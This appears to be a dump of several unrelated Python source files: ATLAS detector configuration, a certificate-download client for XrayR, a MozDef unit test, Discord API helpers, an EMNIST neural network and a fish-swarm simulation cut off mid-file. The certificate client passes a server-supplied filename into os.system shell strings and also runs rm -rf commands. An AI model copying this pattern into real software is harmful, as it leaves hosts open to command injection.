SCT_GeoModel.SCT_GeoModelConfig import SCT_ReadoutGeometryCfg\n\n\ndef SCT_RodDecoderCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n acc = ComponentAccumulator()\n acc.merge(SCT_ReadoutGeometryCfg(flags))\n kwargs.setdefault(\"SCT_CablingTool\", acc.popToolsAndMerge(SCT_CablingToolCfg(flags)))\n 
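\n# --- Editor's note (hedged sketch): how these Cfg helpers are typically consumed; a caller builds its own\n# ComponentAccumulator and merges the sub-accumulators in. The sequence name below is invented for illustration.\ndef sctDecodingSequenceCfg(flags):\n    acc = ComponentAccumulator()\n    acc.merge(SCTRawDataProviderCfg(flags))   # adds the decoding algorithm and its tools\n    acc.merge(SCTEventFlagWriterCfg(flags))   # adds the event-flag writer defined below\n    return acc\n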
kwargs.setdefault(\"ConfigTool\", acc.popToolsAndMerge(SCT_ConfigurationConditionsToolCfg(flags)))\n acc.setPrivateTools(CompFactory.SCT_RodDecoder(name=prefix+\"SCTRodDecoder\"+suffix,\n **kwargs))\n return acc\n\n\ndef SCTRawDataProviderToolCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n acc = ComponentAccumulator()\n kwargs.setdefault(\"Decoder\", acc.popToolsAndMerge(SCT_RodDecoderCfg(flags, prefix=prefix, suffix=suffix)))\n acc.setPrivateTools(CompFactory.SCTRawDataProviderTool(name=prefix+\"SCTRawDataProviderTool\"+suffix,\n **kwargs))\n return acc\n\n\ndef SCTRawDataProviderCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n \"\"\" Configures the main algorithm for SCT raw data decoding \"\"\"\n acc = ComponentAccumulator() \n kwargs.setdefault(\"ProviderTool\", acc.popToolsAndMerge(SCTRawDataProviderToolCfg(flags, prefix, suffix)))\n acc.addEventAlgo(CompFactory.SCTRawDataProvider(name=prefix+\"SCTRawDataProvider\"+suffix,\n **kwargs))\n return acc\n\n\n\ndef TrigSCTRawDataProviderCfg(flags, suffix, RoIs):\n \"\"\" Configures the SCT raw data decoding with trigger args \"\"\"\n\n from RegionSelector.RegSelToolConfig import regSelTool_SCT_Cfg\n\n regSelAcc = regSelTool_SCT_Cfg(flags)\n regSelTools = regSelAcc.popPrivateTools()\n trigargs = {\n 'prefix' : 'Trig',\n 'suffix' : suffix,\n 'RegSelTool' : regSelTools,\n 'RDOKey' : 'SCT_RDOs',\n 'RoIs' : RoIs, \n 'isRoI_Seeded': True,\n 'RDOCacheKey' : 'SctRDOCache',\n 'BSErrCacheKey' : 'SctBSErrCache'\n }\n\n dataPrepAcc = SCTRawDataProviderCfg(flags, **trigargs)\n dataPrepAcc.merge(regSelAcc)\n return dataPrepAcc\n\ndef SCTOverlayRawDataProviderCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n \"\"\" Configures the main algorithm for SCT raw data decoding for data overlay \"\"\"\n kwargs.setdefault(\"RDOKey\", flags.Overlay.BkgPrefix + \"SCT_RDOs\")\n kwargs.setdefault(\"LVL1IDKey\", flags.Overlay.BkgPrefix + \"SCT_LVL1ID\")\n kwargs.setdefault(\"BCIDKey\", flags.Overlay.BkgPrefix + \"SCT_BCID\")\n return SCTRawDataProviderCfg(flags, prefix, suffix, **kwargs)\n\n\ndef SCTEventFlagWriterCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n acc = ComponentAccumulator()\n acc.addEventAlgo(CompFactory.SCTEventFlagWriter(name=prefix+\"SCTEventFlagWriter\"+suffix,\n **kwargs))\n return acc\n","repo_name":"Yusuf-Manjra/athena","sub_path":"InnerDetector/InDetEventCnv/SCT_RawDataByteStreamCnv/python/SCT_RawDataByteStreamCnvConfig.py","file_name":"SCT_RawDataByteStreamCnvConfig.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72708722753","text":"import requests\nimport os\nimport time\nimport logging\nSERVER_URL = \"https://cert/api/v1/\"\nTOKEN = \"your token\"\nCERT_FILE_NAME = \"cert\"\nLOCAL_PATH = os.path.dirname(os.path.abspath(__file__))\nTIMESTAMP = str(int(time.time()))\nMOVE_PATH = \"/etc/XrayR/cert\"\nTMP_PATH = \"/tmp/cert\"+TIMESTAMP+\"/\"\n\nlogging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s-----client:CertDownloader', level=logging.INFO,filename=LOCAL_PATH+'/log')\n\ndef move_cert(fname):\n logging.info(\"move cert\")\n if os.path.exists(MOVE_PATH):\n if os.path.exists(MOVE_PATH+\"_\"+\"bak\"):\n os.system(\"rm -rf \"+MOVE_PATH+\"_\"+\"bak\")\n os.rename(MOVE_PATH,MOVE_PATH+\"_\"+\"bak\")\n os.mkdir(MOVE_PATH)\n os.system(\"unzip \"+LOCAL_PATH+\"/cert/\"+fname+\" -d \"+TMP_PATH)\n try:\n os.system(\"mv \"+TMP_PATH+\"fullchain.pem \"+MOVE_PATH+\"/fullchain.pem\")\n os.system(\"mv 
\"+TMP_PATH+\"privkey.pem \"+MOVE_PATH+\"/privkey.pem\")\n except:\n logging.warning(\"move cert error\")\n logging.info(\"move cert success\")\n os.system(\"rm -rf \"+TMP_PATH)\n restart_xrayr=os.popen(\"XrayR restart\")\n if \"成功\" in restart_xrayr.read():\n logging.info(\"restart xrayr success\")\n else:\n logging.warning(\"restart xrayr error\")\n restart_xrayr.close()\n\n \n \ndef flag_set():\n if not os.path.exists(LOCAL_PATH+\"/cert\"):\n os.mkdir(LOCAL_PATH+\"/cert\")\n for root, dirs, files in os.walk(LOCAL_PATH+\"/cert\"):\n if len(files) == 0:\n logging.info(\"no local files\")\n return True\n elif len(files) == 1:\n logging.info(\"one local file\")\n if files[0].split(\"_\")[0] == CERT_FILE_NAME:\n logging.info(\"file name match\")\n return files[0]\n\ndef main():\n IN_UPDATE = False\n logging.info(\"update cert\")\n download_flag = flag_set()\n if download_flag==True:\n logging.info(\"download cert by first time\")\n r = requests.get(SERVER_URL+CERT_FILE_NAME+\"_\"+TIMESTAMP, params={\"token\": TOKEN,\"download\":True})\n elif download_flag==None:\n return logging.info(\"download_flag is None[file in cert folder are more than one]\")\n else:\n logging.info(\"check update by timestamp\")\n IN_UPDATE = True\n r = requests.get(SERVER_URL+download_flag.split(\".\")[0], params={\"token\": TOKEN})\n if r.status_code == 200 and \"error\" not in r.text:\n fname = r.headers[\"content-disposition\"].split(\";\")[1].split(\"=\")[1].replace('\"', '')\n if IN_UPDATE: os.remove(LOCAL_PATH+\"/cert/\"+download_flag)\n with open(LOCAL_PATH+\"/cert/\"+fname, \"wb\") as f:\n f.write(r.content)\n logging.info(\"download success\")\n move_cert(fname)\n else:\n msg=\"have error or status code not 200: \"+str(r.status_code)+\":\"+r.text\n logging.info(msg)\n\nif __name__ == \"__main__\":\n main()\n # https://cert/api/v1/cert_16687041030?token=\n","repo_name":"yuanweize/CertDeliver","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16934447295","text":"from datetime import datetime\n\nimport alerts.geomodel.alert as alert\nimport alerts.geomodel.factors as factors\n\n\nclass MockMMDB:\n '''Mocks a MaxMind database connection with a dictionary of records mapping\n IP adresses to dictionaries containing information about ASNs.\n '''\n\n def __init__(self, records):\n self.records = records\n\n def get(self, ip):\n return self.records.get(ip)\n\n def close(self):\n return\n\n\ndef null_origin(ip):\n return alert.Origin(\n ip=ip,\n city='Null',\n country='NA',\n latitude=0.0,\n longitude=0.0,\n observed=datetime.now(),\n geopoint='0.0,0.0')\n\n\n# A set of records for a mocked MaxMind database containing information about\n# ASNs used to test the `asn_movement` factor implementation with.\nasn_mvmt_records = {\n '1.2.3.4': {\n 'autonomous_system_number': 54321,\n 'autonomous_system_organization': 'CLOUDFLARENET'\n },\n '4.3.2.1': {\n 'autonomous_system_number': 12345,\n 'autonomous_system_organization': 'MOZILLA_SFO1'\n },\n '5.6.7.8': {\n 'autonomous_system_number': 67891,\n 'autonomous_system_organization': 'AMAZONAWSNET'\n }\n}\n\n\ndef test_asn_movement():\n factor = factors.asn_movement(\n MockMMDB(asn_mvmt_records),\n 'WARNING')\n\n test_hops = [\n alert.Hop(\n origin=null_origin('1.2.3.4'),\n destination=null_origin('4.3.2.1')),\n alert.Hop(\n origin=null_origin('4.3.2.1'),\n destination=null_origin('5.6.7.8'))\n ]\n\n test_alert = alert.Alert(\n 
username='tester',\n hops=test_hops,\n severity='INFO',\n factors=[])\n\n pipeline = [factor]\n\n modified_alert = factors.pipe(test_alert, pipeline)\n\n assert modified_alert.username == test_alert.username\n assert modified_alert.severity == 'WARNING'\n assert len(modified_alert.factors) == 1\n assert 'asn_hops' in modified_alert.factors[0]\n assert len(modified_alert.factors[0]['asn_hops']) == 2\n\n asn_key = 'autonomous_system_organization'\n asn1 = modified_alert.factors[0]['asn_hops'][0][0][asn_key]\n asn2 = modified_alert.factors[0]['asn_hops'][0][1][asn_key]\n asn3 = modified_alert.factors[0]['asn_hops'][1][0][asn_key]\n asn4 = modified_alert.factors[0]['asn_hops'][1][1][asn_key]\n\n assert asn1 == 'CLOUDFLARENET'\n assert asn2 == 'MOZILLA_SFO1'\n assert asn3 == 'MOZILLA_SFO1'\n assert asn4 == 'AMAZONAWSNET'\n","repo_name":"mozilla/MozDef","sub_path":"tests/alerts/geomodel/test_factors.py","file_name":"test_factors.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":2170,"dataset":"github-code","pt":"61"} +{"seq_id":"24666056054","text":"\"\"\"For interacting with the Discord API\"\"\"\n\nimport asyncio\nimport logging\nfrom urllib.parse import quote\n\nimport aiohttp\nimport hikari\nfrom sanic.exceptions import BadRequest, NotFound\n\nfrom munchi.config import Config\nfrom munchi.db import Database\n\nconfig = Config()\ndb = Database().db\nrest = hikari.RESTApp()\n\n\nasync def get_guild(guild: int) -> dict:\n \"\"\"Get a guild (as bot)\"\"\"\n headers = {\"Authorization\": f\"Bot {config.token}\"}\n\n async with aiohttp.ClientSession() as session:\n async with await session.get(\n f\"https://discord.com/api/v10/guilds/{guild}?with_counts=true\",\n headers=headers,\n ) as resp:\n resp.raise_for_status()\n data = await resp.json()\n\n async with await session.get(\n f\"https://discord.com/api/v10/guilds/{guild}/channels\",\n headers=headers,\n ) as resp:\n resp.raise_for_status()\n data[\"channels\"] = await resp.json()\n\n return data\n\n\nasync def get_user_guild(guild_id, token) -> dict:\n \"\"\"Get a user's guild via the bot (Uses user's token to check if bot is in guild)\"\"\"\n async with rest.acquire(token) as client:\n g = None\n\n # Check if user has and can manage guild\n for guild in await client.fetch_my_guilds():\n if guild.my_permissions.all(guild.my_permissions.MANAGE_GUILD) and str(\n guild.id\n ) == str(guild_id):\n g = guild\n break\n\n if not g:\n return\n\n # Get guild information from bot\n return await get_guild(guild_id)\n\n\nasync def get_token(code: str) -> str:\n \"\"\"Get token from code\"\"\"\n async with aiohttp.ClientSession() as session:\n async with await session.post(\n \"https://discord.com/api/v10/oauth2/token\",\n data={\n \"client_id\": config.application_id,\n \"client_secret\": config.client_secret,\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": config.redirect_uri,\n },\n ) as resp:\n logging.debug(\"ERROR\", await resp.json())\n\n if resp.status != 200:\n raise BadRequest(str(await resp.json()))\n\n return (await resp.json())[\"access_token\"]\n\n\nasync def member_in_guild(guild: int, member: int) -> bool:\n \"\"\"Check if member is in guild\"\"\"\n # TODO: Use v10 API (I don't know how to do this with intents yet)\n headers = {\"Authorization\": f\"Bot {config.token}\"}\n\n async with aiohttp.ClientSession() as session:\n async with await session.get(\n f\"https://discord.com/api/v6/guilds/{guild}/members/{member}\",\n headers=headers,\n ) as resp:\n if 
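\n# --- Editor's note (illustration): MockMMDB above only needs get()/close() to stand in for a\n# maxminddb reader, so ASN lookups can be exercised without the real database file.\nreader = MockMMDB({'1.2.3.4': {'autonomous_system_number': 54321}})\nassert reader.get('1.2.3.4')['autonomous_system_number'] == 54321\nassert reader.get('9.9.9.9') is None  # unknown IPs behave like missing records\n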
resp.status in (403, 404):\n return False\n\n resp.raise_for_status()\n\n return True\n\n\nasync def get_user_guild_and_db(guild_id, token):\n guild = await get_user_guild(guild_id, token)\n\n if not guild:\n raise NotFound(\"Guild not found\")\n\n query = {\"guild\": guild_id}\n server = await db[\"server\"].find_one(query)\n\n if not server:\n await db[\"server\"].insert_one(query)\n server = await db[\"server\"].find_one(query)\n\n return guild, server, query\n\n\nasync def process_reaction_message(message):\n channel_id = message[\"channel\"]\n message_id = message[\"message\"]\n reactions = message[\"roles\"]\n\n for reaction in reactions.keys():\n headers = {\"Authorization\": f\"Bot {config.token}\"}\n\n status = None\n\n async with aiohttp.ClientSession() as session:\n # Retry in case of rate limit\n while not status or status == 429:\n status = (\n await session.put(\n f\"https://discord.com/api/v10/channels/{channel_id}/messages/{message_id}/reactions/{quote(reaction)}/@me\",\n headers=headers,\n )\n ).status\n\n await asyncio.sleep(0.25)\n","repo_name":"wxllow/munchi","sub_path":"dashboard/backend/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"285077033","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\nimport matplotlib.pyplot as plt\nfrom scipy import io as spio\nimport numpy as np\n\n\n# In[2]:\n\n\n#loading data\nemnist = spio.loadmat(\"Data/emnist-letters.mat\")\n#Dataset structure \n#emnist[dataset][0][0][0][0][0][0] this is the array for the image pixel values\n#emnist[dataset][0][0][0][0][0][1] this is the array for the labels of the image\n#emnist[dataset][0][0][1][0][0][0] this is the array for the test image pixel values\n#emnist[dataset][0][0][1][0][0][1] this is the array for the labels of the test images\n\n\n# In[3]:\n\n\nx_train = emnist[\"dataset\"][0][0][0][0][0][0] #training images\nx_train = x_train.astype(np.float32)\ny_train = emnist[\"dataset\"][0][0][0][0][0][1] #training labels\n\n\n# In[4]:\n\n\nx_test = emnist[\"dataset\"][0][0][1][0][0][0] #test images\nx_test = x_test.astype(np.float32)\ny_test = emnist[\"dataset\"][0][0][1][0][0][1] #test labels\n\n\n# In[5]:\n\n\ntrain_labels = y_train\ntest_labels = y_test\n\n\n# In[6]:\n\n\n#normalize the test and train \nx_train /= 255\nx_test /= 255\n\n\n# In[7]:\n\n\nx_train.shape[0]\n\n\n# In[8]:\n\n\nx_test.shape[0]\n\n\n# In[9]:\n\n\nx_train = x_train.reshape(x_train.shape[0], 1, 28, 28, order = \"A\")\nx_test = x_test.reshape(x_test.shape[0], 1, 28, 28, order = \"A\")\n\n\n# In[10]:\n\n\nx_train.shape\n\n\n# In[11]:\n\n\ny_train.shape\n\n\n# In[12]:\n\n\n#encode the labels aka make it into an array of zeros and ones\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\n\n# In[13]:\n\n\ny_train.shape\n\n\n# In[14]:\n\n\ny_train[0]\n\n\n# In[20]:\n\n\n#confirm the data is loaded correctly\nsample = 5437\nimg = x_train[sample]\nplt.imshow(img[0], cmap = 'gray')\n\n\n# In[21]:\n\n\n#confirm label is correct\ntrain_labels[sample][0]\n\n\n# In[23]:\n\n\nnum_classes = y_test.shape[1]\n\n\n# In[26]:\n\n\n#create model\nmodel = Sequential()\nlayer1 = Conv2D(30,(5,5), input_shape = (1,28,28), activation = 'relu', 
name = 'layer1')\nmodel.add(layer1)\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nlayer2 = Conv2D(15, (3,3), activation='relu', name = 'layer2')\nmodel.add(layer2)\nmodel.add(MaxPooling2D(pool_size = (2,2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation = 'relu'))\nmodel.add(Dense(50, activation = 'relu'))\nmodel.add(Dense(num_classes, activation='softmax'))\n#compile model\nmodel.compile(loss = 'categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.summary()\n\n\n# In[36]:\n\n\nmodel.fit(x_train, y_train, validation_data=(x_test, y_test), epochs = 6, batch_size = 1000)\n\n\n# In[37]:\n\n\nscores = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Large CNN Error = %.2f%%\" % (100-scores[1]*100))\n\n","repo_name":"holdenDuncan/SLUAVLegacyCode","sub_path":"imageProcessing/classification/EMNIST.py","file_name":"EMNIST.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34970789693","text":"from src.ui.parameter_ui_challenge_simulation import Parameter_UI\nfrom src.models.arena import Arena\nfrom src.models.fish import Fish\nfrom src.models.leader_robot import LeaderRobot\nfrom src.models.agent import (\n attract,\n repulse,\n align,\n check_in_radii_vision,\n normalize,\n get_zone_neighbours,\n)\nfrom src.util.util import Util\nfrom src.util.serialize import serialize\n\nimport random\nimport time\nimport queue\nimport os\nimport sys\nimport logging\nimport numpy as np\nimport yaml # pyyaml\nfrom pathlib import Path\nfrom scipy.spatial import distance_matrix\nfrom logging.handlers import TimedRotatingFileHandler\nfrom datetime import datetime\n\npath_root = Path(__file__).parents[1]\nsys.path.append(str(path_root))\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import pyqtSignal, QObject\n\nFORMAT = \"\\t%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n\n# setup logging\nlogging.basicConfig(format=FORMAT, level=logging.INFO)\nnumba_logger = logging.getLogger(\"numba\")\nnumba_logger.setLevel(logging.WARNING)\n\nnp.warnings.filterwarnings(\"error\", category=np.VisibleDeprecationWarning)\n\n\nclass Behavior(QObject):\n \"\"\"\n Controller class of the challenge simulation. 
In the event loop, it handles the agents movement.\n This class does not connect to RoboTracker or Unity.\n \"\"\"\n\n update_positions = pyqtSignal(list, name=\"update_positions\")\n update_ellipses = pyqtSignal(LeaderRobot, list, name=\"update_ellipses\")\n\n def __init__(self, layout=None, DEBUG_VIS=None, config=None):\n super().__init__()\n\n self.world = None\n self.target = None\n\n self.parameter_ui = None\n\n # load config\n self.config = config\n if self.config is None:\n path = (Path(__file__).parents[1]) / \"cfg/config.yml\"\n logging.info(f\"BEHAVIOR: config path: {path}\")\n self.config = yaml.safe_load(open(path))\n # setup logging\n formatter = logging.Formatter(\n \"\\t%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n\n logger = logging.getLogger()\n handler = TimedRotatingFileHandler(\n Path.home() / self.config[\"LOGGING\"][\"BEHAVIOR\"], when=\"H\", interval=1\n )\n handler.setFormatter(formatter)\n handler.setLevel(logging.INFO)\n logger.addHandler(handler)\n\n # setup util\n self.util = Util(self.config)\n # setup debug visualization\n self.debug_vis = DEBUG_VIS\n\n # setup default parameters\n self.default_num_fish = self.config[\"DEFAULTS\"][\"number_of_fish\"]\n self.optimisation = self.config[\"DEBUG\"][\"optimisation\"]\n\n self.zoa = self.config[\"DEFAULTS\"][\"zoa\"]\n self.zoo = self.config[\"DEFAULTS\"][\"zoo\"]\n self.zor = self.config[\"DEFAULTS\"][\"zor\"]\n\n # time step in seconds\n self.time_step = self.config[\"DEFAULTS\"][\"time_step\"]\n\n # logging\n self.setup_logging()\n\n # arena\n self.arena = Arena(\n [0, 0], self.config[\"ARENA\"][\"width\"], self.config[\"ARENA\"][\"height\"]\n )\n self.middle_pos = [self.arena.width / 2, self.arena.height / 2]\n self.middle_pos_cm = self.util.map_px_to_cm(self.middle_pos)\n\n # initialize robot\n self.behavior_robot = LeaderRobot(self.arena, self.config)\n # self.controlled = False\n self.trigger_next_robot_step = False\n self.flush_robot_target = False\n self.action = []\n self.just_started = False\n\n # initialize fish\n self.reset_fish(self.config[\"DEFAULTS\"][\"number_of_fish\"])\n\n # numba\n self.initiate_numba()\n\n self.parent_layout = (\n layout if self.debug_vis is not None else self.setup_parameter_layout()\n )\n\n # setup parameter ui widget\n self.setup_parameter_ui() # fill parameter layout\n\n # step logger\n self._step_logger = []\n self.exec_time = 0\n self.exec_stepper = 0\n\n self.last_time = datetime.now()\n\n # setup command queue\n self.com_queue = queue.LifoQueue()\n\n # setup debug vis\n if self.debug_vis is not None:\n self.setup_debug_vis()\n\n # catch key events\n if self.debug_vis is not None:\n app = QApplication.instance()\n app.installEventFilter(self)\n self.movelist = []\n\n self.turn_left = False\n self.turn_right = False\n\n logging.info(\"Behavior: Initialized!\")\n\n def initiate_numba(self) -> None:\n \"\"\"\n Initially executes reused functions sped up by JIT compiler numba\n \"\"\"\n repulse(np.asarray([[0.0, 0.0]]), np.asarray([0, 0]))\n align(np.asarray([[0.0, 0.0]]))\n attract(np.asarray([[0.0, 0.0]]), np.asarray([0, 0]))\n check_in_radii_vision(\n np.asarray([[0.0, 0.0]]),\n np.asarray([[0.0, 0.0]]),\n np.asarray([[0.0, 0.0]]),\n 0.0,\n np.asarray([0.0, 0.0]),\n np.asarray([0.0, 0.0]),\n )\n get_zone_neighbours(\n np.asarray([1.4, 2.0, 43.0321, 4214.3123, 2.5]),\n np.zeros((5, 2)),\n np.zeros((5, 2)),\n 10,\n 50,\n 150,\n )\n normalize(np.asarray([1.4, 2.0]))\n\n def setup_logging(self) -> None:\n now = datetime.now()\n formatter = 
logging.Formatter(\"%(asctime)s -8s %(message)s\")\n self.fish_logger = logging.getLogger(\"fish_logger\")\n fish_handler = TimedRotatingFileHandler(\n Path.home() / self.config[\"LOGGING\"][\"FISH\"], when=\"H\", interval=1\n )\n fish_handler.setFormatter(formatter)\n # handler.setLevel(logging.CRITICAL)\n self.fish_logger.addHandler(fish_handler)\n self.fish_logger.warning(f\"Started a new behavior: {now}\")\n self.fish_logger.propagate = False\n\n self.logcounter = 0\n\n def setup_parameter_layout(self):\n logging.info(\"Behavior: Setting up parameter layout\")\n self.app = QApplication(sys.argv)\n layout = QVBoxLayout()\n\n title_label = QLabel(\"

      Parameter Window

      \")\n layout.addWidget(title_label)\n title_label.move(60, 15)\n\n self.window = QWidget()\n self.window.setWindowTitle(\"Parameter window\")\n self.window.setGeometry(100, 100, 200, 200)\n self.window.move(60, 15)\n self.window.setLayout(layout)\n self.window.show()\n\n return layout\n\n def setup_debug_vis(self) -> None:\n self.debug_vis.setArena(self.arena)\n\n def setup_parameter_ui(self) -> None:\n logging.info(\"Behavior: Setting up parameter ui\")\n self.parameter_ui = Parameter_UI(self, False, self.config)\n #\n self.parent_layout.addLayout(self.parameter_ui)\n\n #\n # looping method\n #\n\n def next_speeds(self, robots, fish, timestep):\n \"\"\"\n looping method:\n - the simulation agents are managed\n \"\"\"\n try:\n if self.optimisation:\n start_time = time.time()\n\n try:\n # execute all commands in queue first\n while not (self.com_queue.empty()):\n command = self.com_queue.get()\n if self.config[\"DEBUG\"][\"console\"]:\n logging.info(command)\n try:\n func = getattr(self, command[0])\n args = command[1:]\n func(*args)\n except Exception as e:\n logging.error(\n f\"BEHAVIOR: Command not found or error in command execution! {command}\"\n )\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in command queue\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n # TICK - update all fish one time step forward (tick)\n try:\n all_agents = [self.behavior_robot]\n all_agents.extend(self.allfish)\n all_pos = np.asarray(\n [np.array(a.pos, dtype=np.float64) for a in all_agents]\n )\n all_dir = np.asarray([a.dir for a in all_agents])\n dist_m = distance_matrix(all_pos, all_pos)\n\n for id_f, f in enumerate(all_agents):\n f.tick(all_pos, all_dir, dist_m[id_f])\n # check if fish following the robot\n if id_f != 0:\n robot_pos = all_pos[0]\n robot_dir = all_dir[0]\n f.check_following(robot_pos, robot_dir)\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in tick\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n # MOVE - move everything by new updated direction and speed\n try:\n try:\n for f in all_agents:\n f.move()\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in all agents move\")\n logging(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in move\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n # Update fish in tracking view and send positions\n serialized = serialize(self.behavior_robot, self.allfish)\n self.update_positions.emit(serialized)\n\n # log fish every few ticks when user controlled\n if self.behavior_robot.user_controlled:\n if self.logcounter == 5:\n self.fish_logger.info(f\"{serialized}\")\n self.logcounter = 0\n self.logcounter += 1\n\n if self.optimisation:\n end_time = time.time()\n exec_time = end_time - start_time\n\n if self.exec_stepper == 100:\n self.exec_stepper = 0\n self.exec_time 
= 0\n self.exec_stepper += 1\n self.exec_time += exec_time\n mean_exec_time = self.exec_time / self.exec_stepper\n logging.info(\n f\"mean tick takes {mean_exec_time} seconds; last tick took {exec_time} seconds\"\n )\n\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in next_speeds!\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n def run_thread(self) -> None:\n timestep = 0\n while True:\n self.next_speeds([], [], timestep)\n timestep += 1\n time.sleep(self.time_step)\n\n def __del__(self) -> None:\n pass\n\n def app_exec(self) -> None:\n sys.exit(self.app.exec_())\n\n def serialize(self) -> list:\n out = []\n # robot\n robo_dict = {\n \"id\": self.behavior_robot.id,\n \"orientation\": np.around(self.behavior_robot.ori, decimals=2),\n \"position\": np.rint(self.behavior_robot.pos).tolist(),\n }\n out.append(robo_dict)\n # fish\n for a in self.allfish:\n fish_dict = {\n \"id\": a.id,\n \"orientation\": np.around(a.ori, decimals=2),\n \"position\": np.rint(a.pos).tolist(),\n \"following\": a.following,\n \"repulsed\": a.repulsed,\n }\n # out.append([np.rint(a.pos).tolist(), np.around(a.ori, decimals=2), a.id])\n out.append(fish_dict)\n\n return out\n\n def queue_command(self, command) -> None:\n self.com_queue.put((command[0], command[1]))\n\n #\n # Commands\n #\n # region \n def reset_fish(self, num) -> None:\n \"\"\"\n Receive position reset for current fish\n \"\"\"\n self.allfish = [\n Fish(\n id=i + 1,\n pos=np.asarray(\n [\n random.randint(1, self.arena.width - 1),\n random.randint(1, self.arena.height - 1),\n ]\n ),\n ori=random.randint(0, 360),\n arena=self.arena,\n config=self.config,\n dir=None,\n zor=self.zor,\n zoo=self.zoo,\n zoa=self.zoa,\n )\n for i in range(num)\n ]\n\n # always set fish with id 1 to position 1500,500 if existing\n if len(self.allfish) > 0:\n if self.allfish[0].id == 1:\n self.allfish[0].pos = np.asarray([1500, 500])\n else:\n logging.error(\"BEHAVIOR: Fish with id 1 not existing!\")\n\n self.update_ellipses.emit(self.behavior_robot, self.allfish)\n if self.parameter_ui:\n self.parameter_ui.num_fish_spinbox.setValue(num)\n\n def control_robot(self, flag) -> None:\n \"\"\"\n Receive robot user control trigger\n \"\"\"\n self.behavior_robot.controlled = flag\n self.controlled = flag\n self.behavior_robot.user_controlled = flag\n\n if not flag:\n self.behavior_robot.max_speed = self.config[\"DEFAULTS\"][\"max_speed\"]\n self.behavior_robot.stop = False\n\n def change_robodir(self, dir):\n \"\"\"\n - receives joystick input and translates it into robot direction\n - dir cannot be [0,0]\n \"\"\"\n # dir cannot be [0,0]\n if not (np.abs(dir) == np.asarray([0.0, 0.0])).all():\n self.behavior_robot.stop = False\n np_dir = np.asarray(dir)\n dir_len = np.linalg.norm(np_dir)\n self.behavior_robot.max_speed = self.config[\"DEFAULTS\"][\"max_speed\"] + 10\n self.behavior_robot.new_dir = (\n np_dir / dir_len if dir_len != 0 and dir_len > 1 else np_dir\n )\n else:\n self.behavior_robot.max_speed = 0\n self.behavior_robot.stop = True\n\n def change_zones(self, zone_dir):\n \"\"\"\n Change zone radii for all agents\n \"\"\"\n self.zor = zone_dir.get(\"zor\", self.zor)\n self.zoo = zone_dir.get(\"zoo\", self.zoo)\n self.zoa = zone_dir.get(\"zoa\", self.zoa)\n\n self.behavior_robot.change_zones(self.zor, self.zoo, self.zoa)\n for f in self.allfish:\n f.change_zones(self.zor, self.zoo, self.zoa)\n\n if self.debug_vis:\n 
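# update the debug view so the changed zone radii are drawn immediately\n 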
